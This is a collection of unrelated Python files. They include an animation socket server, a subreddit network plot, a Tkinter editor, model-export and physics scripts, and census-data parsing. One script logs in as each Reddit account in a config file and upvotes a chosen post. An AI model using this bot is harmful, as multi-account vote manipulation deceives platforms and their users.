del c["srcToolCos"][a]
if "destToolCos" in c:
for a in ["x","y"]:
if a in c["destToolCos"]:
o = c["destToolCos"][a]
c["destToolCos"][a] = np.array([o["x"], o["y"], o["z"]])
if np.linalg.norm(c["destToolCos"][a]) <= 0:
del c["destToolCos"][a]
return action_desc
def on_new_client(server, conn, addr):
#client_msg = conn.recv(1024)
print("welcome",addr)
receive_client_message(server, conn)
skel_dict = server.get_skeleton_dict()
server_msg = json.dumps(skel_dict)
server_msg = server_msg.encode("utf-8")
server_msg += b'\x00'
#print("send", len(server_msg), server_msg)
conn.sendall(server_msg)
print("wait for answer")
client_msg = conn.recv(server.buffer_size)
print("received",client_msg)
while True:
try:
frame = server.get_frame()
if frame is not None:
#print("root", frame["rootTranslation"])
server_msg = json.dumps(frame)
server_msg = server_msg.encode("utf-8")
server_msg += b'\x00'
#print("send", len(server_msg))
conn.sendall(server_msg)
#print("sleep", server.get_frame_time())
time.sleep(server.get_frame_time())
receive_client_message(server, conn)
#print("received", client_msg)
except socket.error as error:
print("connection was closed", error.args)
server.set_direction(np.array([0,0,0]))
conn.close()
return
conn.close()
def server_thread(server, s):
print("server started")
while server.run:
c, addr = s.accept()
t = threading.Thread(target=on_new_client, name="addr", args=(server, c, addr))
t.start()
server.connections[addr] = t
print("server stopped")
s.close()
class TCPServer(object):
""" TCP server that sends and receives a single message
https://pymotw.com/2/socket/tcp.html
"""
BUFFER_SIZE = 4092*10000#10485760
def __init__(self, port, buffer_size=BUFFER_SIZE):
self.address = ("", port)
self.buffer_size = buffer_size
self.connections = dict()
self.run = True
self.input_key = ""
def start(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(self.address)
except socket.error:
print("Binding failed")
return
s.listen(10)
t = threading.Thread(target=server_thread, name="c", args=(self, s))
t.start()
print("started server")
def close(self):
self.run = False
def get_frame(self):
return b"frame\n"
class AnimationTCPServerComponent(ComponentBase, TCPServer):
def __init__(self, port, scene_object, src_component):
print("create animation server", port)
ComponentBase.__init__(self, scene_object)
TCPServer.__init__(self, port)
self.src_component_key = src_component
self.animation_src = scene_object._components[src_component]
self.animation_src.animation_server = self
self.activate_emit = True
self.frame_buffer = None
self.skeleton = self.animation_src.get_skeleton()
self.animated_joints = [key for key in self.skeleton.nodes.keys() if len(self.skeleton.nodes[key].children) >0]#self.skeleton.animated_joints# self.animation_src.get_animated_joints()
self.scale = 1.0
self.search_message_header = False
self.activate_simulation = constants.activate_simulation
def start(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(self.address)
except socket.error:
print("Binding failed")
return
s.listen(10)
t = threading.Thread(target=server_thread, name="c", args=(self, s))
t.start()
def update(self, dt):
frame = self.animation_src.get_current_frame()
action = ""
events = list()
is_idle = True
success = True
if self.src_component_key == "morphablegraph_state_machine":
action = self.animation_src.current_node[1]
events = self.animation_src.get_events()
success = self.animation_src.has_success()
is_idle = len(self.animation_src.planner.state_queue) == 0 and not self.animation_src.planner.is_processing
self.frame_buffer = to_unity_frame(self.skeleton, frame, self.animated_joints, self.scale, action, events, is_idle, success)
self.frame_buffer["annotation"] = str(self.animation_src.get_current_annotation_label())
self.animation_src.handle_keyboard_input(self.input_key)
def get_frame(self):
return self.frame_buffer
def get_frame_time(self):
return self.animation_src.get_frame_time()
def get_skeleton_dict(self):
desc = self.skeleton.to_unity_format(animated_joints=self.animated_joints)
#print(self.animated_joints, desc["jointDescs"])
return desc
def set_direction(self, direction_vector):
if self.src_component_key == "morphablegraph_state_machine":
length = np.linalg.norm(direction_vector)
if length > 0:
self.animation_src.direction_vector = direction_vector/length
self.animation_src.target_projection_len = length
else:
self.animation_src.target_projection_len = 0
def schedule_action(self, action, position=None):
print("schedule action", action, position)
if self.src_component_key == "morphablegraph_state_machine":
if position is not None:
self.animation_src.set_action_constraint(action["name"], action["keyframe"], position, action["joint"])
self.animation_src.transition_to_action(action["name"])
def schedule_action_path(self, action, dt=STANDARD_DT, refresh=False):
#print("schedule action with path", action)
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.enqueue_states([action], dt, refresh)
#t = threading.Thread(target=self.animation_src.enqueue_states, name="c", args=(action, _control_points, 1.0/120, True))
#t.start()
def schedule_action_sequence(self, action_sequence, dt=STANDARD_DT, refresh=False):
print("schedule action sequence")
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.enqueue_states(action_sequence, dt, refresh)
def schedule_direction_sequence(self, direction_sequence, dt=STANDARD_DT, refresh=False):
print("schedule action sequence")
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.enqueue_states(direction_sequence, dt, refresh)
def play_clip(self, clip_name):
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.play_clip(clip_name)
def set_avatar_position(self, position):
print("set position", position)
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.set_global_position(position)
def set_avatar_orientation(self, orientation):
print("set orientation", orientation)
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.set_global_orientation(orientation)
def unpause_motion(self):
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.unpause()
def set_scene_from_desc(self, desc):
#self.scene_object.scene.object_builder.create_object("scene_desc", desc, self.scene_object.scene.visualize)
func_name = "create_objects"
func = self.scene_object.scene.object_builder.create_object
params = "scene_desc", desc, self.scene_object.scene.visualize
if self.activate_simulation:
self.scene_object.scene.schedule_func_call(func_name, func, params)
def handle_collision(self):
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.handle_collision()
|
# Create Subreddit network using networkx
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import ast
import collections
from tqdm import tqdm
from itertools import count
import networkx as nx
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
input_subreddits = ['ClimateSkeptics','Climate']
# Set minimum number of individual users and submissions required for a subreddit to be added to the network
min_users = 20
min_submissions = 1000
# Read in csv
cs_df = pd.read_csv('climateskeptics_SubredditNetwork_FULL.csv')
co_df = pd.read_csv('climate_SubredditNetwork_FULL.csv')
cs_df = cs_df[cs_df['Distinct_Users'] > min_users]
cs_df = cs_df[cs_df['Total_Submissions'] > min_submissions]
co_df = co_df[co_df['Distinct_Users'] > min_users]
co_df = co_df[co_df['Total_Submissions'] > min_submissions]
# Create Full DataFrame with All Data
# Need to split up skeptics and activists
cs_df['CS_Submissions'] = cs_df['Total_Submissions']
cs_df['CS_Users'] = cs_df['Distinct_Users']
cs_df['CO_Submissions'] = 0
cs_df['CO_Users'] = 0
co_df['CS_Submissions'] = 0
co_df['CS_Users'] = 0
co_df['CO_Submissions'] = co_df['Total_Submissions']
co_df['CO_Users'] = co_df['Distinct_Users']
# Combine dataframes and merge, grouping by subreddits and summing the other columns
full_df = pd.concat([cs_df,co_df],ignore_index=True)
full_df = full_df.groupby(['Subreddits']).sum().reset_index()
full_df = full_df.sort_values(by=['Distinct_Users'],ascending=False)
full_df.reset_index(drop=True, inplace=True)
cs_nodes = list(cs_df['Subreddits'])
co_nodes = list(co_df['Subreddits'])
# Create Graph
G = nx.Graph()
G.add_node('ClimateSkeptics', perc_cs = 100, totalsubs=60000) # Add home node
G.add_node('Climate',perc_cs = 0, totalsubs=60000)
for n in cs_nodes:
idx = full_df.loc[full_df['Subreddits'] == n].index[0]
total_subs = full_df['Total_Submissions'][idx]
perc_cs_users = (full_df['CS_Users'][idx]/full_df['Distinct_Users'][idx])*100
G.add_node(n,perc_cs = float(perc_cs_users), totalsubs = total_subs)
G.add_edge('ClimateSkeptics',n,weight=full_df['CS_Users'][idx])
for n in co_nodes:
idx = full_df.loc[full_df['Subreddits'] == n].index[0]
total_subs = full_df['Total_Submissions'][idx]
perc_cs_users = (full_df['CS_Users'][idx]/full_df['Distinct_Users'][idx])*100
G.add_node(n,perc_cs = float(perc_cs_users), totalsubs = total_subs)
G.add_edge('Climate',n,weight=full_df['CO_Users'][idx])
# Create Network Plot
nodes = G.nodes()
colors = [G.node[n]['perc_cs'] for n in nodes]
sizes = [(G.node[n]['totalsubs']/50) for n in nodes]
fig = plt.figure()
pos = nx.spring_layout(G)
ec = nx.draw_networkx_edges(G, pos, alpha=0.2)
nc = nx.draw_networkx_nodes(G, pos, nodelist=nodes, node_color=colors, node_size=sizes, with_labels=True, cmap=plt.cm.RdYlGn_r, alpha=0.95)
nx.draw_networkx_labels(G, pos=pos, font_size=10)
cbar = plt.colorbar(nc)
cbar.set_label("% Users from /r/climateskeptics", rotation = 90, fontsize=16)
plt.axis('off')
fig.tight_layout()
plt.show()
# Export to GEPHI Format
#nx.write_gexf(G, "test.gexf")
|
#!C:\python27
import time
def performance(f):
def exec_time(*args,**kw):
time_s=time.time()
res=f(*args,**kw)
time_e=time.time()
print 'call %s in %fs'%(f.__name__,(time_e-time_s))
return res
return exec_time
@performance
def factorial(n):
return reduce(lambda x,y:x*y,range(1,n+1))
print factorial(20)
|
import json
def render_stack(error):
return '\n '.join(error.get('stack'))
def render_error(component_name, data):
return """
<div style="background-color: #ff5a5f; color: #fff; padding: 12px;">
<p style="margin: 0">
<strong>Warning!</strong>
The <code>{}</code> component failed to render with Hypernova.
Error stack:
</p>
<pre style="padding: 0 20px; white-space: pre-wrap;">{}</pre>
</div>
{}
""".format(
component_name, render_stack(data.get('error')), data.get('html')
)
def render_error_or_html(data):
if data.get('error'):
return render_error(data.get('error'))
return data.get('html')
class DevModePlugin(object):
"""Plugin to enable additional logging from Hypernova"""
def __init__(self, logger):
self.logger = logger
def after_response(self, current_response, original_response):
updated = current_response.copy()
for name, data in updated.iteritems():
if data.get('error'):
data['html'] = render_error(name, data)
return updated
def on_error(self, error, jobs):
self.logger.debug(render_stack(error))
|
from tkinter import *
from tkinter.filedialog import asksaveasfilename, askopenfilename
import subprocess
import sys
Window = Tk()
Window.title("Pycoder")
font = ("Comic Sans MS", 16)
fontcolor = "black"
fontback = "gray"
try:
FilePath = sys.argv[1]
except:
FilePath = ""
def prompt(message):
messagewiddow = Toplevel()
messagewiddow.geometry("250x50")
Label(messagewiddow, text = message).pack()
def save():
with open(FilePath, "w") as file:
code = editor.get("1.0", END)
file.write(code)
def saveas():
global FilePath
FilePath = asksaveasfilename(filetype = [("Python File", "*.py")])
with open(FilePath, "w") as file:
code = editor.get("1.0", END)
file.write(code)
def openfile():
global FilePath
FilePath = askopenfilename(filetype = (("Python File", "*.py"),))
with open(FilePath, "r") as file:
code = file.read()
editor.delete("1.0", END)
editor.insert("1.0", code)
def runcode():
if FilePath == "":
prompt("file not saved")
return
com = f'python {FilePath}'
process = subprocess.Popen(com, stdout= subprocess.PIPE, stderr= subprocess.PIPE, shell=True)
output, error = process.communicate()
ConsoleOut.insert("1.0", output)
ConsoleOut.insert("1.0", error)
MainBar = Menu(Window)
# file menu
FileBar = Menu(MainBar, tearoff = 0)
FileBar.add_command(label = "Open", command = openfile)
FileBar.add_command(label = "Save", command = save)
FileBar.add_command(label = "Save As", command = saveas)
FileBar.add_command(label = "Exit", command = exit)
MainBar.add_cascade(label ="File", menu = FileBar)
# run menu
runBar = Menu(MainBar, tearoff = 0)
runBar.add_command(label = "Run", command = runcode)
MainBar.add_cascade(label ="Run", menu = runBar)
Window.config(menu=MainBar)
editor = Text(height = 10,bg=fontback, fg = fontcolor)
editor.grid(row=0, column = 0)
editor.configure(font = font)
ConsoleOut = Text(height = 7,bg=fontback, fg = fontcolor)
ConsoleOut.grid(row=1, column =0)
ConsoleOut.configure(font = font)
Window.mainloop()
|
from flask import Flask
import requests
import json
#Import App ID and App Secret from Config file
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile('secret.cfg')
|
import tensorflow.compat.v1 as tf
import os
from tensorflow.python.tools.freeze_graph import freeze_graph
from model import CycleGAN
import utils
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string('checkpoint_dir', 'checkpointsce/20211125-1624', 'checkpoints directory path')
tf.flags.DEFINE_string('XtoY_model', 'cbct2sct.pb', 'XtoY model name, default: cbct2sct.pb')
tf.flags.DEFINE_string('YtoX_model', 'sct2cbct.pb', 'YtoX model name, default: sct2cbct.pb')
tf.flags.DEFINE_integer('width', '288', 'width, default: 320')
tf.flags.DEFINE_integer('height', '320', 'height, default: 288')
tf.flags.DEFINE_integer('ngf', 32, 'number of gen filters in first conv layer, default: 32')
tf.flags.DEFINE_string('norm', 'instance', '[instance, batch] use instance norm or batch norm, default: instance')
def export_graph(model_name, XtoY=True):
graph = tf.Graph()
with graph.as_default():
cycle_gan = CycleGAN(ngf=FLAGS.ngf, norm=FLAGS.norm, height=FLAGS.height, width=FLAGS.width)
input_image = tf.placeholder(tf.float32, shape=[FLAGS.height,FLAGS.width, 1], name='input_image')
cycle_gan.model()
if XtoY:
output_image = cycle_gan.G.sample(tf.expand_dims(input_image, 0))
else:
output_image = cycle_gan.F.sample(tf.expand_dims(input_image, 0))
output_image = tf.identity(output_image, name='output_image')
restore_saver = tf.train.Saver()
export_saver = tf.train.Saver()
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
latest_ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)
restore_saver.restore(sess, latest_ckpt)
output_graph_def = tf.graph_util.convert_variables_to_constants(
sess, graph.as_graph_def(), [output_image.op.name])
tf.train.write_graph(output_graph_def, 'pretrained', model_name, as_text=False)
def main(unused_argv):
print('Export XtoY model...')
export_graph(FLAGS.XtoY_model, XtoY=True)
if __name__ == '__main__':
tf.app.run()
|
from tests.test_yuos_client import VALID_PROPOSAL_DATA
from yuos_query.utils import (
deserialise_proposals_from_json,
serialise_proposals_to_json,
)
def test_converting_proposals_to_json_and_back():
proposal_json = serialise_proposals_to_json(VALID_PROPOSAL_DATA)
proposals = deserialise_proposals_from_json(proposal_json)
assert proposals["471120"].id == VALID_PROPOSAL_DATA["471120"].id
assert proposals["471120"].title == VALID_PROPOSAL_DATA["471120"].title
assert proposals["471120"].proposer == VALID_PROPOSAL_DATA["471120"].proposer
assert proposals["471120"].users == VALID_PROPOSAL_DATA["471120"].users
assert proposals["471120"].db_id == VALID_PROPOSAL_DATA["471120"].db_id
assert (
proposals["471120"].samples[0].name
== VALID_PROPOSAL_DATA["471120"].samples[0].name
)
assert (
proposals["471120"].samples[0].formula
== VALID_PROPOSAL_DATA["471120"].samples[0].formula
)
assert (
proposals["471120"].samples[0].number
== VALID_PROPOSAL_DATA["471120"].samples[0].number
)
assert (
proposals["471120"].samples[0].mass_or_volume
== VALID_PROPOSAL_DATA["471120"].samples[0].mass_or_volume
)
assert (
proposals["471120"].samples[0].density
== VALID_PROPOSAL_DATA["471120"].samples[0].density
)
|
from sys import argv
from os import getenv
from configparser import ConfigParser
from logging import getLogger, FileHandler, Formatter, StreamHandler
from praw.models import Submission
from praw import Reddit
LOG_LEVEL = getenv("LOG_LEVEL", "INFO")
log_formatter = Formatter(
"%(asctime)s, %(levelname)s [%(filename)s:%(lineno)d] %(funcName)s(): %(message)s",
datefmt="%d/%m/%Y %H:%M:%S",
)
logger = getLogger(__name__)
logger.setLevel(LOG_LEVEL)
# Add file handler to logger
file = FileHandler(filename="logs/access.log", mode="a")
file.setFormatter(log_formatter)
logger.addHandler(file)
# Add stream handler to logger
stream = StreamHandler()
stream.setFormatter(log_formatter)
logger.addHandler(stream)
def main():
args = argv[1:]
if len(args) > 1:
print("Too many arguments. Missing 1 required positional argument")
exit(-1)
elif len(args) < 1:
print("No URL argument provided")
exit(-2)
else:
try:
config = ConfigParser()
config.read("praw.ini")
for section in config.sections():
logger.info(f"Will login as {section}")
bot = Reddit(
site_name=section,
config_interpolation="basic",
)
logger.info(f"Logged in as {bot.user.me()}")
submission: Submission = bot.submission(url=args[0])
submission.upvote()
logger.info(f"{bot.user.me()} voted up {submission.url}")
except Exception as e:
logger.error(f"{e}")
if __name__ == "__main__":
main()
|
import bpy
import sys
def print_usage():
print("usage: export.py target_file")
argv = sys.argv[1:]
if '--' not in argv:
print_usage()
exit(1)
argv = argv[argv.index("--") + 1:]
if len(argv) != 1:
print_usage()
exit(1)
target_file = argv[0]
bpy.ops.export_scene.gltf(filepath=target_file, export_apply=True, export_colors=False)
|
##
# Torsional Drillstring Model
# Parameters for Well B
#
# @Authors: Ulf Jakob Aarsnes, Roman Shor, Jonathan McIntyre
#
# Copyright 2021 Open Drilling Project
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
#
import math
import numpy as np
from scipy.interpolate import interp1d
class parameters_WellB:
def __init__(self, MD, mu, fRat, oThres):
# Physical parameters
LcV = np.array([48.700, 114.800, 56.700, 38.880])
ODV = np.array([0.150473, 0.187322, 0.209550, 0.247280])
IDV = np.array([0.096207, 0.098912, 0.071438, 0.123391])
# Averaged polar moment of inertia and cross sectional area for BHA
self.Ac = np.sum(LcV * math.pi * ((ODV / 2) ** 2 - (IDV / 2) ** 2)) / np.sum(LcV)
self.Jc = math.pi * np.sum(LcV * math.pi * (ODV ** 4 - IDV ** 4) / 32) / np.sum(LcV)
self.Cro = np.sum(LcV * ODV / 2) / sum(LcV)
# Pipe
self.Pro = 0.146529 / 2 # [m] Drill string inner radius
self.Pri = 0.123024 / 2 # [m] Drill string outer radius
self.Jp = math.pi / 2 * (self.Pro ** 4 - self.Pri ** 4) # [m^4] Drill string polar moment of inertia
self.Ap = math.pi * (self.Pro ** 2 - self.Pri ** 2) # [m^2] Drill string cross sectional area
self.Gp = 61e9 # [m] Pipe shear modulus
self.Gc = 67e9 # [m] Collar shear modulus
self.rho = 7850 # [kg/m3] Density
self.I_TD = 2900 # [kgm^2] Actual top drive measured mass moment of inertia
self.kt = 50 * 1 # [-] Torsional damping
# Computed quantities
self.c_t = math.sqrt(self.Gp / self.rho)
# Length parameters
self.Lc = 230 # [m] Drill collar length
self.Lp = MD - self.Lc # [m] Drill pipe length
# Numerics params
Pt = 1000 # Number of cells in discretization
self.Pp = round(Pt * self.Lp / (self.Lp + self.Lc)) # Pipe cells
self.Pc = Pt - self.Pp # Collar cells
self.xp = np.linspace(0, self.Lp, self.Pp)
self.xc = self.Lp + np.linspace(0, self.Lc, self.Pc)
# Inclination vectors
MD_prof = np.array([0, 500, 1600, 4000])
inc_prof = np.array([0, 0, 60, 60])
self.PthetaVec = interp1d(MD_prof, inc_prof)(self.xp) * math.pi / 180
self.CthetaVec = interp1d(MD_prof, inc_prof)(self.xc) * math.pi / 180
# Coulomb friction params
self.f_thres = mu
self.f_tRat = fRat
self.o_thres = oThres
g = 9.81 # Acceleration of gravity
self.P_thresProfile = g * np.sin(self.PthetaVec) * self.rho * self.Ap * self.Pro * self.f_thres # Torque per meter [Nm/m]
self.C_thresProfile = g * np.sin(self.CthetaVec) * self.rho * self.Ac * self.Cro * self.f_thres # Torque per meter [Nm/m]
|
import csv, numbers, os
from enum import Enum
from models.Person import *
from Utilities import Logger
def get_acs_person_data(filepath, year):
# set up personal logger
logger = Logger()
current_path = os.getcwd()
logger.define_issue_log(os.path.join(current_path, 'files/issues.log'))
dictionary_of_people = dict()
with open(filepath) as csvfile:
file_reader = csv.reader(csvfile)
line = next(file_reader)
class Column(Enum):
SERIALNO = line.index('SERIALNO')
ST = line.index('ST')
PUMA = line.index('PUMA')
AGEP = line.index('AGEP')
SCHL = line.index('SCHL')
MAR = line.index('MAR')
HICOV = line.index('HICOV')
RACBLK = line.index('RACBLK') # 0 = not black; 1 = black
DIS = line.index('DIS') # 1 = disabled; 2 = not disabled
MIL = line.index('MIL') # 1-3 = veteran
WAOB = line.index('WAOB') # 1-2 = non-immigrant
NWAB = line.index('NWAB') # 1 = temp work absence; 2 = no
try:
i = 0
while True:
acs_row = next(file_reader)
serial_number = acs_row[Column.SERIALNO.value]
person = Person(serial_number)
state = acs_row[Column.ST.value]
person.state = state # TODO make an enum of state names and use it here
person.puma = state + acs_row[Column.PUMA.value] + year
person.age = acs_row[Column.AGEP.value]
person.education = acs_row[Column.SCHL.value]
if acs_row[Column.MAR.value] == '3':
person.divorced = True
else:
person.divorced = False
if acs_row[Column.HICOV.value] == '1':
person.insured = True
else:
person.insured = False
if acs_row[Column.RACBLK.value] == '1':
person.black = True
else:
person.black = False
if acs_row[Column.DIS.value] == '1':
person.disabled = True
else:
person.disabled = False
mil = acs_row[Column.MIL.value]
if mil == '1' or mil == '2' or mil == '3':
person.veteran = True
else:
person.veteran = False
if acs_row[Column.WAOB.value] == '1' or acs_row[Column.WAOB.value] == '2':
person.immigrant = False
else:
person.immigrant = True
nwab = acs_row[Column.NWAB.value]
if nwab == '1':
person.unemployed = True
elif nwab == '2' or nwab == 'b':
person.unemployed = False
else:
person.unemployed = 'NA'
id = serial_number + state + year
dictionary_of_people[id] = person
# i += 1
# logger.log('Setting up person #', format(i, ',d'), erase=True)
except StopIteration:
pass
logger.log('Created', format(len(dictionary_of_people), ',d'), 'people from', filepath)
return dictionary_of_people
def get_responses(filepath, year):
numbers = list()
with open(filepath) as csvfile:
file_reader = csv.reader(csvfile)
line = next(file_reader)
class Column(Enum):
SERIALNO = line.index('SERIALNO')
ST = line.index('ST')
PUMA = line.index('PUMA')
AGEP = line.index('AGEP')
SCHL = line.index('SCHL')
MAR = line.index('MAR')
HICOV = line.index('HICOV')
RACBLK = line.index('RACBLK') # 0 = not black; 1 = black
DIS = line.index('DIS') # 1 = disabled; 2 = not disabled
MIL = line.index('MIL') # 1-3 = veteran
WAOB = line.index('WAOB') # 1-2 = non-immigrant
NWAB = line.index('NWAB') # 1 = temp work absence; 2 = no
total = 0
divorced = 0
insured = 0
black = 0
disabled = 0
veteran = 0
immigrant = 0
unemployed = 0
try:
while True:
acs_row = next(file_reader)
total += 1
# education += 1
if acs_row[Column.MAR.value]: # has a value
divorced += 1
if acs_row[Column.HICOV.value]: # has a value
insured += 1
if acs_row[Column.RACBLK.value]: # has a value
black += 1
if acs_row[Column.DIS.value]: # has a value
disabled += 1
if acs_row[Column.MIL.value]: # has a value
veteran += 1
if acs_row[Column.WAOB.value]: # has a value
immigrant += 1
if acs_row[Column.NWAB.value] and not acs_row[Column.NWAB.value] == '3': # has a value, and was reported
unemployed += 1
except StopIteration:
pass
numbers = [float(divorced) / total, float(insured) / total, float(black) / total, float(disabled) / total, float(veteran) / total, float(immigrant) / total, float(unemployed) / total]
return numbers
|
from digitize import digitize
from bincount import bincount
|
########################################################
# evaluator.py
# Author: Jamie Zhu <jimzhu@GitHub>
# Created: 2014/2/6
# Last updated: 2015/8/30
########################################################
import numpy as np
from numpy import linalg as LA
import time, sys, os
import random
import logging
import multiprocessing
import cPickle as pickle
from PPCF import P_UIPCC
from PPCF.commons import evaluator
#======================================================#
# Function to evalute the approach at each density
#======================================================#
def execute(matrix, para):
# loop over each density and each round
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for den in para['density']:
for roundId in xrange(para['rounds']):
pool.apply_async(executeOneSetting, (matrix, den, roundId, para))
pool.close()
pool.join()
else: # run on single processes
for den in para['density']:
for roundId in xrange(para['rounds']):
executeOneSetting(matrix, den, roundId, para)
# summarize the dumped results
summarizeResult(para)
#======================================================#
# Function to run the prediction approach at one setting
#======================================================#
def executeOneSetting(matrix, density, roundId, para):
logging.info('density=%.2f, %2d-round starts.'%(density, roundId + 1))
startTime = time.clock()
timeResult = np.zeros(5)
evalResult = np.zeros((len(para['metrics']), 5))
# remove data matrix
logging.info('Removing entries from data matrix...')
(trainMatrix, testMatrix) = evaluator.removeEntries(matrix, density, roundId)
# data perturbation by adding noises
logging.info('Data perturbation...')
(perturbMatrix, uMean, uStd) = randomPerturb(trainMatrix, para)
# UMEAN
logging.info('UMEAN prediction...')
iterStartTime1 = time.clock()
predMatrixUMEAN = P_UIPCC.UMEAN(perturbMatrix)
timeResult[0] = time.clock() - iterStartTime1
# IMEAN
logging.info('IMEAN prediction...')
iterStartTime2 = time.clock()
predMatrixIMEAN = P_UIPCC.IMEAN(perturbMatrix)
timeResult[1] = time.clock() - iterStartTime2
# UPCC
logging.info('UPCC prediction...')
iterStartTime3 = time.clock()
predMatrixUPCC = P_UIPCC.UPCC(perturbMatrix, para)
timeResult[2] = time.clock() - iterStartTime3 + timeResult[0]
# IPCC
logging.info('IPCC prediction...')
iterStartTime4 = time.clock()
predMatrixIPCC = P_UIPCC.IPCC(perturbMatrix, para)
timeResult[3] = time.clock() - iterStartTime4 + timeResult[1]
# UIPCC
logging.info('UIPCC prediction...')
iterStartTime5 = time.clock()
predMatrixUIPCC = P_UIPCC.UIPCC(perturbMatrix, predMatrixUPCC, predMatrixIPCC, para)
timeResult[4] = time.clock() - iterStartTime5 + timeResult[2] + timeResult[3]
# evaluate the estimation error
predMatrixUMEAN = reNormalize(predMatrixUMEAN, uMean, uStd)
evalResult[:, 0] = evaluator.evaluate(testMatrix, predMatrixUMEAN, para)
predMatrixIMEAN = reNormalize(predMatrixIMEAN, uMean, uStd)
evalResult[:, 1] = evaluator.evaluate(testMatrix, predMatrixIMEAN, para)
predMatrixUPCC = reNormalize(predMatrixUPCC, uMean, uStd)
evalResult[:, 2] = evaluator.evaluate(testMatrix, predMatrixUPCC, para)
predMatrixIPCC = reNormalize(predMatrixIPCC, uMean, uStd)
evalResult[:, 3] = evaluator.evaluate(testMatrix, predMatrixIPCC, para)
predMatrixUIPCC = reNormalize(predMatrixUIPCC, uMean, uStd)
evalResult[:, 4] = evaluator.evaluate(testMatrix, predMatrixUIPCC, para)
# dump the result at each density
result = (evalResult, timeResult)
outFile = '%s%s_%s_result_%.2f_round%02d.tmp'%(para['outPath'], para['dataName'],
para['dataType'], density, roundId + 1)
evaluator.dumpresult(outFile, result)
logging.info('density=%.2f, %2d-round done.'%(density, roundId + 1))
logging.info('----------------------------------------------')
#======================================================#
# Function to process the raw result files
# Overide evalib.summarizeResult()
#======================================================#
def summarizeResult(para):
approach = ['UMEAN', 'IMEAN', 'UPCC', 'IPCC', 'UIPCC']
path = '%s%s_%s_result'%(para['outPath'], para['dataName'], para['dataType'])
evalResults = np.zeros((len(para['density']), para['rounds'], len(para['metrics']), len(approach)))
timeResult = np.zeros((len(para['density']), para['rounds'], len(approach)))
k = 0
for den in para['density']:
for rnd in xrange(para['rounds']):
inputfile = path + '_%.2f_round%02d.tmp'%(den, rnd + 1)
with open(inputfile, 'rb') as fid:
data = pickle.load(fid)
(evalResults[k, rnd, :, :], timeResult[k, rnd, :]) = data
os.remove(inputfile)
k += 1
for i in xrange(len(approach)):
evaluator.saveSummaryResult(path + '_' + approach[i], evalResults[:, :, :, i], timeResult[:, :, i], para)
#======================================================#
# Function to perturb the entries of data matrix
#======================================================#
def randomPerturb(matrix, para):
perturbMatrix = matrix.copy()
(numUser, numService) = matrix.shape
uMean = np.zeros(numUser)
uStd = np.zeros(numUser)
noiseRange = para['noiseRange']
# z-score normalization
for i in xrange(numUser):
qos = matrix[i, :]
qos = qos[qos != 0]
mu = np.average(qos)
sigma = np.std(qos)
uMean[i] = mu
uStd[i] = sigma
perturbMatrix[i, :] = (perturbMatrix[i, :] - mu) / sigma
if para['noiseType'] == 'guassian':
noiseVec = np.random.normal(0, noiseRange, numService)
elif para['noiseType'] == 'uniform':
noiseVec = np.random.uniform(-noiseRange, noiseRange, numService)
perturbMatrix[i, :] += noiseVec
perturbMatrix[matrix == 0] = 0
return (perturbMatrix, uMean, uStd)
#======================================================#
# Function to perturb the entries of data matrix
#======================================================#
def reNormalize(matrix, uMean, uStd):
numUser = matrix.shape[0]
resultMatrix = matrix.copy()
for i in xrange(numUser):
resultMatrix[i, :] = resultMatrix[i, :] * uStd[i] + uMean[i]
resultMatrix[resultMatrix < 0] = 0
return resultMatrix
|
from typing import Protocol, Iterable, runtime_checkable
from datetime import date
from decimal import Decimal
from quickforex.domain import CurrencyPair, DateRange
@runtime_checkable
class ProviderBase(Protocol):
identifier: str
def get_latest_rates(
self, currency_pairs: Iterable[CurrencyPair]
) -> dict[CurrencyPair, Decimal]:
"""
:param currency_pairs: Currency pairs for which to retrieve the exchange rates
:return: Last exchange rate for each provided currency pair.
"""
...
def get_latest_rate(self, currency_pair: CurrencyPair) -> Decimal:
"""
:param currency_pair:
:return: Last exchange rate for the provided currency pair.
"""
...
def get_historical_rates(
self, currency_pairs: Iterable[CurrencyPair], as_of: date
) -> dict[CurrencyPair, Decimal]:
"""
:param currency_pairs:
:param as_of:
:return: Historical exchange rate for each provided currency pair.
"""
...
def get_historical_rate(self, currency_pair: CurrencyPair, as_of: date) -> Decimal:
"""
:param currency_pair:
:param as_of:
:return: Historical exchange rate for the provided currency pair.
"""
...
def get_rates_time_series(
self, currency_pairs: Iterable[CurrencyPair], date_range: DateRange
) -> dict[CurrencyPair, dict[date, Decimal]]:
"""
:param currency_pairs: Currency pairs for which to retrieve the exchange rates. This argument can either be
a list of of currency pairs or a single currency pair.
:param date_range: Date range over which the exchange rates should be retrieved.
:return:
"""
...
|
"""
Write a Python program that randomizes 7 numbers
and prints their sum total.
